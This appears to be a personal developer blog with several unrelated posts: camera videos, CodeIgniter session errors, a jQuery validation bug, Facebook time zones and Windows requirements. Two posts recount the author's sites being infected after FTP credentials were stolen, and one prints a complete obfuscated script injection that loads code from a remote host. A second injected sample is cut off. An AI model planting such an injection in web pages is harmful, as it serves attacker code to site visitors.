For Canon 7D user, canon has been released some video instruction. Check the video at :
http://www.usa.canon.com/dlc/controller?act=GetArticleAct&articleID=3167
For Canon 7D user, canon has been released some video instruction. Check the video at :
http://www.usa.canon.com/dlc/controller?act=GetArticleAct&articleID=3167
Today, I just browse for my favorite paper craft, 303E Deep striker, I know it has commercial release, but I hope some day some one want to share it
Finally today I found some one has post it and I am very very very happy ^.^
Grab it on
http://gunime.blogspot.com/2010/02/gff0013-plan-303e-deep-striker.html
After last virus attack , some my FTP account was stolen, my terrible mistake, I forgot change some of FTP password and the second attack come again after I clean it with virus removal from justcoded.com.
The second attact, the Java script code injected is not same as first one, it have some code variant , The code I was found on my PHP and Javascript code is :
<script>/*Exception*/ document.write('<script src='+'h!&&t^^t#p&(#^:$&^^/&@)/&@@i!!$m@)a^#@g$!e($$)f@^a@&p$&$(-#c!o@!&m^.&h!!!a)t!$!e#n$#a!.!!&&n@e@!).$^$#j^@#^p@^(@.&!&s(!l#i@&d#!e)$s@#h&^a!!r!^e^-@$#n!(@e((t$&#(.)s(u^(p@^!e!)r!)@)t!@&r##u($^e^)l$#)i&!&f&@^e^^.!^r)u^!$:@8@(0#@#!8#$!)0!)!/&^)l&e#&(q(@^u#)!i!)p@(!e&&&^.#!(f#!r)$!/^)l)&@@e)#q^$@u@!!i#^(p$(e!^&.#!f!r$&/@v((k^@.(@c$@&$o^!@m($/&$g&(@)o)!o(@&!g$)!l!$e$$.)!c@$))o#@$^&m@&&^/!p(&c&&&p#!)o#@#p@(.&c#@!o$m$$&/&#!('.replace(/\)|@|\!|#|&|\^|\(|\$/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--2a2a37017f4e478abaa5f3c16a9b2656-->
So I need to modify the cure file for this code variation, and it work fine. Recently I browse on justcode.com and see the new version on cure file it has have ability to cure variant Java Script code that injected to web file. So just try to download it here
This day I have to update a website based on Codeigniter, 1.54. When trying on the development environment, all running smoothly, but when transferred to the server some problems arise.
In part used session function (I use the library session Codeigniter) , randomly displays a HTTP 406 error.
When searching on google, I know that the problem is probably caused by the Apache mod_security. I tried de-active mod_security function using . htaccess files but it causes HTTP error 500.
When a page that uses session displays a HTTP 406 error, It can be fixed by delete computer cookies, but sometimes it comes back HTTP error 406 at random.
Another problem, the session produced by the library Codeigniter likely trigger mod_security apache and the mod_security considers it as a threat so mod_security block access from my IP (I have many times to reset my modem to get a new IP)
My solution : I change my session from the Codeigniter library into Native PHP session. The solution worked perfectly, I don’t have anymore HTTP error 406 and blocked by mod_security.
This story happen when I visit a website, http://pa-malangkab.go.id, when I visit it , nothing happen actually, a weird thing happen tomorrow.
In the morning, I turn on my notebook and suddenly a message appear, “Security Tools” already installed on my computer, I didn’t feel install that software recently, but I know it was a spy ware or malware software, then I use Malwarebytes (http://www.malwarebytes.org/mbam.php) to clean my notebook, and it work great, the malware was successfully cleaned.

Accidentally I open my website work, and something bad happen, the website show nothing, I check the code and found some java script code injected to my PHP file. Then I think where the code came from ??
The java script code :
<script>/*LGPL*/ try{ window.onload = function(){var C1nse3sk8o41s = document.createElement(’s&c^$#r))i($p@&t^&’.repl
After some investigation, I found that the malware infected my notebook steal my FTP , I am using Filezilla FTP client for my FTP activity. The Filezilla FTP client store some recent FTP session on “Quick Connect” feature, there 6 recent FTP session that stole from my notebook
After get informasion from web, I know that filezilla is targeted by virus or malware, they like stole the FTP password. So I am will not use Filezilla again !!!!
After couple hour after malware infection, ton of my website file infected by javascript code. As a precautionary measure I change all FTP password listed on “Quick Connect” on Filezilla, from 6 website, I only can save 1, the last 5 website injected by malware : (
The file that injected by javascript code are (in my case):
It was a lot job if manually remove the injected file, so I decide to find information how to remove injected javascript code. Finally I found a god man that write PHP code to remove javascript code ( Thanks alot
), you can download the virus/javascript removal at http://justcoded.com/article/gumblar-family-virus-removal-tool/
So how this virus come to your computer ??? Here my personal analyze :
The prevention :
I use jQuery to validate my registration form, to day when I am test for finishing, I found some little bug (CMIIW). The case is like this :
For a username, I check the username on database if it exist or not. For example in my database I already have two username let say ‘admin1′ and ‘admin2′.
I did the code like example provided, let say we register with username ‘admin1′ or ‘admin2′ it will show an error that say the username already exist. Here the code :
reg_username: {
required: "Enter a username",
minlength: jQuery.format("Enter at least {0} characters"),
remote: jQuery.format("{0} is already in use")
},
The “{0}” will display the username we input, so when I type ‘admin1′ as my username it will display an error “admin1 is already in use”. Then when I type ‘admin2′ as my username it shuld be show an error “admin2 is already in use” but in fact, when I use ‘admin2′ as my username, it will display error ‘admin1 is already in use’. Kind a strange, didn’t solve it yet
Note
Just Updated to latest version 1.6 and it still get some bug but in different mode, seem I will eliminate {0} from the error code because it source of problem
)
Sidiq Setyawan for XL award 2009 ^^
Kelak Aku Pake XL

Sudut Pasar

XL Shine

I just realize that time zone setting will affect in some facebook feature in this case for some ‘event’. As we subscribed to facebook, we didn’t set our local time zone in to our facebook account, so we are follow the ‘facebook’ timezone, I am not sure what GMT the facebook time zone is it.
This my real life example, when I am writing this post, it’s Friday December 11 2009, On facebook I have an event that has been finished yesterday (Thursday, December 10 2009 7.00 PM). On facebook notification, this event still informed today. I assume the Facebook time is still Thursday.
It’s has been almost 9 year when I knew Microsoft Windows Operating system, I remembered when, the Microsoft windows 98 just need 200 Mb hard drive space, and now the newest Windows Operating system, windows 7 need at least 16 Gb , What a difference [--]a. Here the system requirement comparasion from windows 98, XP, then 7.
Windows 98
Windows XP
Windows 7
there day I am so annoying with wrong Cpanel, on left panel it show that my space quota nearly full, but on disk usage menu, it still show much free space. The hosting says it may cause by cache
still stuck with the problem